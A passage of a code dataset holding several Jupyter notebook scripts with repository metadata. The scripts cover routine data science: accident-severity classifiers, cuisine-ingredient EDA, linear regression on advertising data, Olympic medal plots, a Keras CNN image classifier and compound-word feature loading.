label');\nall_sample_title = 'Accuracy Score: {0}'.format(score1)\nplt.title(all_sample_title, size = 15);\n\n# + _uuid=\"792fde8192da1ce1f38c78bdc02d410c75b49cda\"\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_RFC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\nall_sample_title = 'Accuracy Score: {0}'.format(score2)\nplt.title(all_sample_title, size = 15);\n\n# + _uuid=\"fa539e2c6b80affe1a6f0dba2eac922a2ac49cf4\"\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_DTC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\nall_sample_title = 'Accuracy Score: {0}'.format(score3)\nplt.title(all_sample_title, size = 15);\n\n# + _uuid=\"196edd26a3a73320749003dff8d86d20e446480b\"\n\n\n# + _uuid=\"116917f5821194fad25083f40ad885e18a79cf1e\"\n# Grid Search\nfrom sklearn.model_selection import GridSearchCV\n\n\n# + _uuid=\"7a85aaa4bfa04627709cb8282ac3862fca09788b\"\nRFC = RandomForestClassifier(random_state=42)\n# bootstrap = [True,False]\n# max_depth = [70,80, 90, 100, 110,120, None]\nmax_features = ['log2','sqrt']\n# min_samples_leaf = [3, 4, 5]\n# min_samples_split = [2,10,50,100, 150]\n# n_estimators = [20,50,100, 200, 300]\nn_estimators = [200]\n\n# + _uuid=\"71baa0f58e56c1816b52c8b802e463d0eab24770\"\n# estimator = GridSearchCV(RFC,dict(#max_depth = max_depth,\\\n# max_features = max_features,\\\n# n_estimators = n_estimators),\\\n# cv = 10, scoring = 'accuracy', n_jobs = -1)\n\n# + _uuid=\"863fb39613ece8524aa66abd1eefa85eeb002ce0\"\n# import time\n# from sklearn.metrics import classification_report\n# start_time = time.time()\n# estimator.fit(X_train,y_train)\n# preds = estimator.predict(x_test)\n# # print(\"Total time of GridSearchCV and prediction:\" % (time.time() - start_time))\n# print(classification_report(y_test,preds))\n\n\n# + _uuid=\"e49d7f7b151acda1e9aec8f024a9acf227978302\"\n# # 'max_features': 'sqrt', 'n_estimators': 200}\n# estimator.best_params_\n\n# + _uuid=\"846874ae194f9377cb69a015377913c47ce8ddaa\"\n# from sklearn import linear_model\n# # Create logistic regression\n# logistic = linear_model.LogisticRegression()\n\n# # Create regularization penalty space\n# penalty = ['l2']\n\n# # Create regularization hyperparameter space\n# C = np.logspace(2, 4, 10)\n\n# # Create hyperparameter options\n# hyperparameters = dict(C=C, penalty=penalty, solver = ['newton-cg'],multi_class=['auto'])\n\n# clf_estimator = GridSearchCV(logistic, hyperparameters, cv=10, verbose=0)\n\n# + _uuid=\"8f6f077855d8f41adba4a14d1ea661b2744115f5\"\n# clf_estimator.fit(X_train,y_train)\n# preds = clf_estimator.predict(x_test)\n# # print(\"Total time of GridSearchCV and prediction:\" % (time.time() - start_time))\n# print(classification_report(y_test,preds))\n\n# + _uuid=\"dc37f83266e47fcb5ccba29a44a9a8e8501977ac\"\n# clf_estimator.best_params_\n\n# + _uuid=\"0178279920544dff5f4963218d0844107567ae6a\"\nLR = LogisticRegression(C = 774,multi_class = 'auto', penalty = 'l2', solver = 'newton-cg')\nLR.fit(X_train, y_train)\n\n# + _uuid=\"6b978d59cb7e1e0fed4d30c15f3169c0a5354578\"\nfrom sklearn.metrics import accuracy_score\n\npredictions_LR = LR.predict(x_test)\nacc = balanced_accuracy_score(predictions_LR, y_test) \nprint(\"Logistic Regression Test Accuracy:\",acc)\nprint()\ncm_LR = metrics.confusion_matrix(y_test, predictions_LR)\nprint(cm_LR)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_LR, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\n\n\n\n# + _uuid=\"2de81e89363d3cc0d95de2365ebdb44c753a1f7e\"\nX_train[:5]\n\n# + _uuid=\"add50e1a5dca5521884b5e18e7b538307f5e3053\"\ntest_set2 = X\n\ntest_set2_labels = test_set2[\"Accident_Severity\"].copy()\ntest_set2 = test_set2.drop(\"Accident_Severity\", axis=1)\n\ny_test2 = le.fit_transform(test_set2_labels)\n\n\n# + _uuid=\"e57015d0c823f48b6b35f34326088954f8d9969a\"\ntest_set2 = scaler.transform(test_set2)\n\n# + _uuid=\"62beddd140786408e77a8b424da8625f92c14618\"\ntest_set2.shape\n\n# + _uuid=\"406b0256a6a4e00008638cabf0f751625b6d60c6\"\npredictions2_LR = LR.predict(test_set2)\n\nacc = balanced_accuracy_score(predictions2_LR, y_test2)\n# acc = cohen_kappa_score(predictions2_LR, y_test2)\nprint(\"Logistic Regression Test Accuracy:\",acc)\nprint()\ncm_LR = metrics.confusion_matrix(y_test2, predictions2_LR)\nprint(cm_LR)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_LR, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\n\n\n# + _uuid=\"1e60d53714bd03ddf17644f57da34aa1b759e7f3\"\n# Balanced Random Forest Classifier\n\nfrom imblearn.ensemble import BalancedRandomForestClassifier\n\nBRFC = BalancedRandomForestClassifier(random_state=42)\n\n\nfrom sklearn.model_selection import train_test_split\nX2_train, X2_test = train_test_split(X2, test_size=0.2, random_state=42)\n\nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\n\n# Separate labels from the rest of the dataset\nX2_train_labels = X2_train[\"Accident_Severity\"].copy()\nX2_train = X2_train.drop(\"Accident_Severity\", axis=1)\n\nX2_test_labels = X2_test[\"Accident_Severity\"].copy()\nX2_test = X2_test.drop(\"Accident_Severity\", axis=1)\n\nX2_train_labels = le.fit_transform(X2_train_labels)\nX2_test_labels = le.fit_transform(X2_test_labels)\n\n\nfrom sklearn.preprocessing import MinMaxScaler as Scaler\n\nscaler = Scaler()\nscaler.fit(X2_train)\n\nX2_train_scaled = scaler.transform(X2_train)\nX2_test_scaled = scaler.transform(X2_test)\n\n\n\nBRFC.fit(X2_train_scaled, X2_train_labels)\n\n\n\n\n\n# + _uuid=\"b6097987d364419467aa9fef4483aa760940e0f8\"\npredictions2_BRFC = BRFC.predict(X2_test_scaled)\n\nacc = balanced_accuracy_score(predictions2_BRFC, X2_test_labels)\n# acc = cohen_kappa_score(predictions2_BRFC, X2_test_labels)\nprint(\"BRFC:\",acc)\nprint()\ncm_BRFC = metrics.confusion_matrix(X2_test_labels, predictions2_BRFC)\nprint(cm_BRFC)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_BRFC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\n\n# + _uuid=\"566a8d9e619f4d836bf6500971403c3c9d8b5e1c\"\n# Easy Ensemble Classifier\n\nfrom imblearn.ensemble import EasyEnsembleClassifier\n\nEEC = EasyEnsembleClassifier(random_state=42)\n\n\n# from sklearn.model_selection import train_test_split\n# X2_train, X2_test = train_test_split(X2, test_size=0.2, random_state=42)\n\n# from sklearn.preprocessing import LabelEncoder\n# le = LabelEncoder()\n\n# # Separate labels from the rest of the dataset\n# X2_train_labels = X2_train[\"Accident_Severity\"].copy()\n# X2_train = X2_train.drop(\"Accident_Severity\", axis=1)\n\n# X2_test_labels = X2_test[\"Accident_Severity\"].copy()\n# X2_test = X2_test.drop(\"Accident_Severity\", axis=1)\n\n# X2_train_labels = le.fit_transform(X2_train_labels)\n# X2_test_labels = le.fit_transform(X2_test_labels)\n\n\n# from sklearn.preprocessing import MinMaxScaler as Scaler\n\n# scaler = Scaler()\n# scaler.fit(X2_train)\n\n# X2_train_scaled = scaler.transform(X2_train)\n# X2_test_scaled = scaler.transform(X2_test)\n\n\n\nEEC.fit(X2_train_scaled, X2_train_labels)\n\n\n\n# + _uuid=\"34d7a319bbbb6dcfa9fa71145381c34e5e98508e\"\npredictions2_EEC = EEC.predict(X2_test_scaled)\n\nacc = balanced_accuracy_score(predictions2_EEC, X2_test_labels)\n# acc = cohen_kappa_score(predictions2_BRFC, X2_test_labels)\nprint(\"EEC:\",acc)\nprint()\ncm_EEC = metrics.confusion_matrix(X2_test_labels, predictions2_EEC)\nprint(cm_EEC)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_EEC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\n\n# + _uuid=\"452827475ca301e38d64b2ec5430dc6a23f9506c\"\n\n","repo_name":"Eridanous/Data-Mining","sub_path":"dataminingproject.ipynb","file_name":"dataminingproject.ipynb","file_ext":"py","file_size_in_byte":26779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"39488740604","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport re\n\n# +\n# Read in the cuisine_ingredients csv file\ncolumn_names = [\"cuisine\", \"recipe\", \"ingredients\", \"full_ingredients\", \"image_url\"]\ndf = pd.read_csv(\"cuisine_ingredients.csv\", names=column_names, encoding='utf-16')\n\n# Overview of the dataset\ndf.sample(20, random_state=1)\n# -\n\ndf.info()\n\n# There are 4724 rows in the dataset. At a glance, there are no null values in cuisine, recipe, ingredients, and full_ingredients columns, while there are quite a few null values in the image_url column.\n\n# Drop duplicated rows if any\ndf.drop_duplicates(inplace=True)\ndf.shape\n\n# There are no duplicated rows.\n\n# Check uniqueness of each column's values\nfor col in df.columns:\n print(col, \"is unique:\", df[col].is_unique)\n\n# It appears that one recipe name can have different sets of full ingredients.\n\n# > When web-scraping the data, I've decided to scrape both streamlined ingredients (with green-highlighted hyperlinks to the ingredients' sites) and the full ingredient list (with the quantity of each ingredient and sometimes with some simple preparation steps) as illustrated in the below image. The full ingredient list will be more comprehensive but require more cleaning. To check which feature (ingredients vs. full_ingredients) should be used for the Natural Language Processing pipeline, we'll do some EDA on these variables like checking minimum and maximum numbers of characters in column ingredients to identify any outlier.\n\n# ![screenshot-ingredients.png](attachment:screenshot-ingredients.png)\n#
(Image source: https://www.bbc.co.uk/food/recipes/californian_sourdough_59703)
\n\n# Snapshot of some ingredient text\ndf.full_ingredients.sample(20, random_state=2)\n\n# At glance, each ingredient for a recipe in the full_ingredients column can be splitted by `',`. We can't simply split by `,` because an ingredient can be accompanied by some preparation steps also seperated by `,`. Additionally, due to the nature of text, either `'` or `\"` can exist within one ingredient text. Hence, either `\"` or `'` can be used to wrap around an ingredient text to seperate it from another in the ingredient list. To overcome this, I'll apply some regular expression operations to seperate individual ingredients.\n\n# +\n# Check the max and min number of ingredients of a recipe in the \"ingredients\" column\n\ningredient_check = df.ingredients.apply(lambda x: re.split(\"\\', | \\\",\", x)).apply(len)\nprint(f\"Maximum number of ingredients in the 'ingredients' column in a recipe: {ingredient_check.max()}\")\nprint(f\"Minimum number of ingredients in the 'ingredients' column in a recipe: {ingredient_check.min()}\")\n\n# +\n# Check the max and min number of ingredients of a recipe in the \"full_ingredients\" column\n\nfull_ingredients_check = df.full_ingredients.apply(lambda x: re.split(\"\\', | \\\",\", x)).apply(len)\nprint(f\"Maximum number of ingredients in the 'full_ingredients' column in a recipe: {full_ingredients_check.max()}\")\nprint(f\"Minimum number of ingredients in the 'full_ingredients' column in a recipe: {full_ingredients_check.min()}\")\n# -\n\n# It seems rare that a recipe has only one ingredient. Let's visualise the number of ingredients distribution in both the \"ingredients\" and \"full_ingredients\" columns.\n\nplt.figure(figsize=(8,6))\nsns.kdeplot(ingredient_check)\nplt.title('Distribution of number of ingredients in the \"ingredients\" column')\nplt.xlabel('Number of ingredients')\nplt.ylabel('Density')\nplt.show()\ningredient_check.describe()\n\nplt.figure(figsize=(8,6))\nsns.kdeplot(full_ingredients_check)\nplt.title('Distribution of number of ingredients in the \"full_ingredients\" column')\nplt.xlabel('Number of ingredients')\nplt.ylabel('Density')\nplt.show()\nfull_ingredients_check.describe()\n\n# The distributions of the number of ingredients between the columns are quite synced. Both are skewed right and unimodal. Most recipes have about 10 ingredients. To examine the possible outliers, we'll investigate recipes with less than 3 ingredients or more than 45 ingredients in either the \"ingredients\" column or the \"full_ingredients\" column.\n\ndf[(ingredient_check < 3) | (ingredient_check > 45) | (full_ingredients_check > 45) | (\n full_ingredients_check < 3)][[\"cuisine\", \"recipe\", \"ingredients\", \"full_ingredients\"]]\n\n# A closer look tells me that there are some inconsistencies between the number of ingredients in the \"ingredients\" column vs \"full_ingredients\" column of the same recipe. There is also a blank value `[]` in the \"ingredients\" overlooked in the previous step. We'll calculate the differences and plot their distribution.\n\nnum_ingredients_difference = full_ingredients_check - ingredient_check\nplt.figure(figsize=(8, 6))\nsns.kdeplot(num_ingredients_difference)\nplt.title('Distribution of differences between numbers of ingredients in the \"full_ingredients\" and \"ingredients\" column')\nplt.xlabel('Number of ingredients in difference')\nplt.ylabel('Density')\nplt.show()\nnum_ingredients_difference.describe()\n\n# Less than 80% of the recipes have no difference between the number of ingredients between the \"ingredients\" column and \"full_ingredients\". The remaining 20% are considered significant given our dataset size is not very big. Hence, we'll use the \"full_ingredients\" column for the NLP pipeline, though this feature will need more text cleaning.\n\n# Transform cuisine and ingredients into a seperate table\ndf[[\"cuisine\", \"recipe\", \"full_ingredients\"]].to_csv(\"cuisine_full_ingredients.csv\", index=False)\n\n\n","repo_name":"momcancode/Cuisine-Demystifier-NLP-ML-Project","sub_path":"data/01_transform_bbcfood_cuisine.ipynb","file_name":"01_transform_bbcfood_cuisine.ipynb","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"29017326877","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom sklearn.linear_model import LinearRegression\n\ndf=pd.read_csv(r\"C:\\Users\\adith\\OneDrive\\Desktop\\Adithya\\My Projects\\Linear Reg\\Advertising.csv\")\ndf\n\nx=df['TV'].values.reshape(-1,1)\ny=df['Sales'].values.reshape(-1,1)\ny\n\nlin=LinearRegression()\nlin.fit(x,y)\nPred_y=lin.predict(x)\nPred_y\n\nnp.concatenate((y,Pred_y),axis=1)\n\n# #### MAE- This measures absolute averege distance between real data and predicted data \n# #### MSE-This measures squared average distance between real data and predicted data\n\n((y-Pred_y)**2).mean() #MSE\n\nnp.abs(y-Pred_y).mean() #MAE\n\nfrom sklearn import metrics\nprint(metrics.mean_absolute_error(y,Pred_y))\nprint(metrics.mean_squared_error(y,Pred_y))\n\nplt.scatter(x,y)\nplt.plot(x,lin.predict(x))\n","repo_name":"AdithyaChalla12/ML","sub_path":"Regression/LR1 (1).ipynb","file_name":"LR1 (1).ipynb","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"14498963792","text":"# En un histograma, visualizar el GDP per Capita de cada país. Bonus: ordenar el histograma en orden decreciente.\n#\n\nimport pandas as pandas\nDF = pandas.read_csv('summer.csv', sep=\",\")\nDF[::]\n\nDFWinter=pandas.read_csv('winter.csv',sep = ',')\nDFWinter[::]\n\nDFDictionary=pandas.read_csv('dictionary.csv',sep = ',')\nDFDictionary[::]\n\n\nimport matplotlib.pyplot as plot\n\nDFDictionary['GDP per Capita'].plot(kind='bar')\nplot.show()\n\n# ¿Cuál es el número de medalla por cada país, sin diferenciar el tipo de medalla, en los juegos de verano? Visualizar en un histograma.\n#\n\n# +\n\nNewDF= DF.groupby('Country')['Medal'].count().plot(kind='bar')\nplot.show()\n\n\n# -\n\n# ¿Cuál es el número de medalla por cada país, diferenciando el color de la medalla, en los juegos de verano? Visualizar en un histograma.\n\nDForo=DF.loc[DF['Medal'] == 'Gold']\nDForo[::]\nDForo.groupby('Country')['Medal'].count().plot(kind='bar')\nplot.show()\n\n\nDForo=DF.loc[DF['Medal'] == 'Silver']\nDForo.groupby('Country')['Medal'].count().plot(kind='bar',color='g')\nplot.show()\n\nDFbronze=DF.loc[DF['Medal'] == 'Bronze']\nDFbronze.groupby('Country')['Medal'].count().plot(kind='bar', color='b')\nDFsilver=DF.loc[DF['Medal'] == 'Silver']\nDFsilver.groupby('Country')['Medal'].count().plot(kind='bar',color='g')\nDForo=DF.loc[DF['Medal'] == 'Gold']\nDForo.groupby('Country')['Medal'].count().plot(kind='bar',color='Y')\nplot.show()\n\nplot.rcParams['figure.figsize'] = (25, 15)\n\nDForo.groupby('Country')['Medal'].count()\n\n\n# ¿Cuál es el número de medalla por cada país, diferenciando el color de la medalla, en los juegos de verano y invierno? Visualizar en un mismo histograma\n\nhole=DFWinter\n\nhole\n\n\n","repo_name":"felipeOyarzun/Taller_Base_datos","sub_path":"Prueba Felipe Oyarzun.ipynb","file_name":"Prueba Felipe Oyarzun.ipynb","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"5710405445","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"aYqcFyExrWbo\"\n\n\n# + id=\"H215ikbNVVZS\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"98ffeccb-58d6-4795-f62c-87707e048611\"\n# cd /content/drive/MyDrive/Colab Notebooks/dataset\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"z7VB1d4wVdov\" outputId=\"463707c9-01a1-4cc8-edda-193e787dd7b5\"\n# ls\n\n# + id=\"5IGm26ZzVGBs\"\n# import the necessary packages\nfrom keras.models import Sequential\nfrom keras.layers.core import Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers.core import Dense\nfrom keras.optimizers import Adam\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom PIL import Image\nfrom imutils import paths\nimport numpy as np\nimport os\n\n# + id=\"0-5PXYTsVGBw\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"623f3782-24b2-4ce0-8af1-e595559a443c\"\nprint(\"[INFO] loading images...\")\nimagePaths1 = paths.list_images(\"GMB_01\")\nimagePaths2 = paths.list_images(\"GMB_03\")\nimagePaths3 = paths.list_images(\"GMB_07\")\nimagePaths4 = paths.list_images(\"GMB_08\")\nimagePaths5 = paths.list_images(\"GMB_09\")\ndata = []\nlabels = []\n\n# + id=\"9Q-KXSsGVGB0\"\nfor imagePath in imagePaths1:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths2:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths3:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths4:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths5:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\n\n# + id=\"Rzbolh88VGB2\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"3eb5aa0c-bced-49d0-ab1e-5150fd0cd81e\"\nprint(labels)\n\n# + id=\"twd1IeuKVGB5\"\n# encode the labels, converting them from strings to integers\nlb = LabelBinarizer()\nlabels = lb.fit_transform(labels)\n\n# + id=\"5FPCyIqcVGB7\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"d963acc9-3281-460d-e54e-3f15cee451b8\"\nprint(labels)\n\n# + id=\"ktZ5hNYwVGB9\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"372a158c-59fe-4a2f-d1bc-3e8208286765\"\n# perform a training and testing split, using 75% of the data for\n# training and 25% for evaluation\n(trainX, testX, trainY, testY) = train_test_split(np.array(data),\tnp.array(labels), test_size=0.25, shuffle=True)\nprint(trainX.shape)\nprint(testX.shape)\n\n# + id=\"MSxR7GLQvrUP\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"e0ae78d5-32bf-49cb-b43d-8857bb60f059\"\nfrom keras.layers import Convolution2D, MaxPool2D\nfrom keras.models import Sequential\nfrom keras.layers.core import Flatten, Dense\n\nmodel1 = Sequential()\nmodel1.add(Convolution2D(8, (3,3), activation='relu', input_shape=(168,168,3)))\nmodel1.add(MaxPool2D(2,2))\nmodel1.add(Convolution2D(16, (3,3), activation='relu'))\nmodel1.add(MaxPool2D(2,2))\n#fully connected layer\nmodel1.add(Flatten())\nmodel1.add(Dense(100, activation='relu'))\nmodel1.add(Dense(5, activation='softmax'))\n\nmodel1.summary()\n\n# + id=\"ggcSdj_aVGCB\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"91b78c20-8637-4bab-d071-efc9f1907c53\"\n# train the model using the Adam optimizer\nprint(\"[INFO] training network...\")\nopt = Adam(lr=1e-3, decay=1e-3 / 50)\nmodel1.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\n# + id=\"3bbMakb0w-XZ\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"2b106afc-7b68-4302-b9df-2254ee4f49f9\"\nH = model1.fit(trainX, trainY, validation_data=(testX, testY), epochs=30, batch_size=32)\n\n# + id=\"98_oXi-lcgux\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 592} outputId=\"b8d5fde6-441b-4eea-f6b3-be9e5ab3983b\"\nimport matplotlib.pyplot as plt\n\nprint(H.history.keys())\n# summarize history for accuracy\nplt.plot(H.history['accuracy'])\nplt.plot(H.history['val_accuracy'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(H.history['loss'])\nplt.plot(H.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n# + id=\"lPAZkmBJVGCD\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"0d16df04-ae27-4b41-9ebe-a32c42aa8ffe\"\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model1.predict(testX, batch_size=32)\nprint(classification_report(testY.argmax(axis=1),\n\tpredictions.argmax(axis=1), target_names=lb.classes_))\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"NQcNvdOeAQTt\" outputId=\"7cce4a5b-2136-4d4a-a0f8-ef4a7c0de8b4\"\n# cd /content/drive/MyDrive/Colab Notebooks/\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"wMdUR2iEAX_i\" outputId=\"f97d9faf-1fe4-4b42-a5e5-b25efe79641d\"\n# ls\n\n# + id=\"4uBcj8x8iwTw\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"e02c71fe-4ef1-4cbd-fca0-29dee1f8bca0\"\nmodel1.save('nnmodel_scene')\n\n# + id=\"AOwJT2jLVGCN\"\nimport cv2\nimport matplotlib.pyplot as plt\nimage1='daun.jpg'\n\n# + id=\"PkM68K4GVGCP\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 288} outputId=\"9ffb1965-abb1-4a14-9dba-810603fc15d1\"\nimg_array = cv2.imread(image1)\nprint(type(img_array))\nplt.imshow(img_array)\nplt.show()\n\n\n# + id=\"1ZkNY8LWVGCR\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"788ff09d-58d7-4635-99d6-2f462a660722\"\nimage_testing = Image.open('daun.jpg')\nimage_testing = np.array(image_testing.resize((168, 168))) / 255.0\nimage_testing.shape\n\n# + id=\"qL66nfOcVGCT\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"ff759259-2f8f-4f2c-cb91-4f1cc1a1f8fe\"\nimage_testing = np.expand_dims(image_testing, axis=0)\nprint(image_testing.shape)\n\n# + id=\"vTy9yP1AVGCV\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"5ba74645-fccc-4511-87c5-7571546f8ff6\"\noutput = model1.predict(image_testing, 1)\nprint(output)\nprint(lb.classes_[output.argmax(axis=1)])\n","repo_name":"aldiidf/TUGASPYTHON11","sub_path":"TUGASPYTHONALDIDF.ipynb","file_name":"TUGASPYTHONALDIDF.ipynb","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"40535078203","text":"# +\nimport pandas as pd\nimport numpy as np\nfrom nltk.stem import WordNetLemmatizer\nlemmatizer = WordNetLemmatizer()\npd.options.display.float_format = '{:,.3f}'.format\n\npd.options.mode.chained_assignment = None\nimport seaborn as sns\n# %matplotlib inline\nsns.set(style=\"whitegrid\", font_scale = 2.5)\nsns.set_context(rc={\"lines.markersize\": 17, \"lines.linewidth\": 2})\n\nuse_pgf = False\nimport matplotlib\nimport matplotlib.ticker as ticker\nif use_pgf:\n matplotlib.use(\"pgf\")\n matplotlib.rcParams.update({\n \"pgf.texsystem\": \"pdflatex\",\n 'font.family': 'serif',\n 'text.usetex': True,\n 'pgf.rcfonts': False,\n })\n\nimport pickle as pkl\nfrom matplotlib import pyplot as plt\nplt.rcParams.update({'figure.max_open_warning': 0})\n\nfrom scipy.stats.stats import pearsonr\nfrom scipy.stats.stats import pearsonr\n\nfrom functools import reduce\n# -\n\nplotdir = \"../Plots/coha_new/\"\ncutoff = 100\ntimespan = 20\ndimension = 300\n#tagged = \"Tagged\"\ntagged = \"UnTagged\"\nppmi_preprocess = \"PPMI\"\n#ppmi_preprocess = \"RAW\"\nmedianImpute = \"med\"\n#medianImpute = \"na\"\n#mode = \"CompoundAware\"\nmode = \"CompoundAgnostic\"\n#mode = \"Setting\"\nnew_plot_col=list(range(1820,2010,timespan))\nfeaturefile = \"../../../Compounding/datasets/features_new/features_{}_{}_{}_{}_{}_{}.csv\".format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute)\n#compoundfile = \"../../../Compounding/datasets/features_new/compounds_{}_{}_{}_{}.csv\".format(mode, ppmi_preprocess, timespan, cutoff, dimension)\ncompoundfile = \"../../../Compounding/datasets/compounds.pkl\"\n#constituentsfile = \"../../../Compounding/datasets/features_new/constituents_CompoundAgnostic_{}_{}_{}.csv\".format(timespan, cutoff, dimension)\nconstituentsfile = \"../../../Compounding/datasets/heads.pkl\"\n\nfeatures=pd.read_csv(featurefile, sep=\"\\t\")\nfeatures['compound_rating']=''\nfeatures.loc[features.compound_mean>=4,'compound_rating']='high-rated'\nfeatures.loc[(features.compound_mean>=2) & (features.compound_mean<4),'compound_rating']='med-rated'\nfeatures.loc[features.compound_mean<2,'compound_rating']='low-rated'\nfeatures = features[features.compound_rating != \"med-rated\"]\nfeatures.compound_rating.value_counts()\n\nfeatures\n\nfeatures.loc[(features[\"modifier\"] == \"web\") & (features[\"head\"] == \"site\")]\n\nto_add_cols=['compound_mean','compound_rating']\nlmi_cols = [col for col in features.columns if 'local_mi' in col]\nllr_cols = [col for col in features.columns if 'log_ratio' in col]\nppmi_cols = [col for col in features.columns if 'ppmi' in col]\nsim_bw_constituents_cols = [col for col in features.columns if 'sim_bw_constituents' in col]\nsim_with_head_cols = [col for col in features.columns if 'sim_with_head' in col]\nsim_with_modifier_cols = [col for col in features.columns if 'sim_with_modifier' in col]\nhead_prod_cols = [col for col in features.columns if 'head_prod' in col]\nmod_prod_cols = [col for col in features.columns if 'mod_prod' in col]\n#selected_compounds=['health insurance','silver bullet','melting pot','gold mine','swimming pool','bank account']\n#assert (len(lmi_cols)+len(llr_cols)+len(ppmi_cols)+len(sim_bw_constituents_cols)+len(sim_with_head_cols)+len(sim_with_modifier_cols))==(len(features.columns))\n\n# Function to get dataframe for plotting for each feature group\ndef get_plot_df(feature_group_columns):\n df=features.set_index([\"modifier\", \"head\"])[feature_group_columns+to_add_cols]\n df.reset_index(inplace=True)\n df['compound']=df['modifier']+' '+df['head']\n df.drop(['modifier','head'],axis=1,inplace=True)\n df.set_index('compound',inplace=True)\n old_vars=[x.split(':')[1] for x in df.columns if 'compound' not in x]\n df.columns=old_vars+to_add_cols\n df.reset_index(inplace=True)\n plot_df=pd.melt(df,id_vars=['compound','compound_rating','compound_mean'],\n value_vars=old_vars)\n return plot_df\n\n\n# Function to save plots to dir\ndef save_plots(g, file_prefix):\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.png'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute), dpi=300)\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.jpg'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute), dpi=300)\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.tiff'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.pgf'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute))\n\n\nplot_head_prod_df = get_plot_df(head_prod_cols)\nplot_head_prod_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, 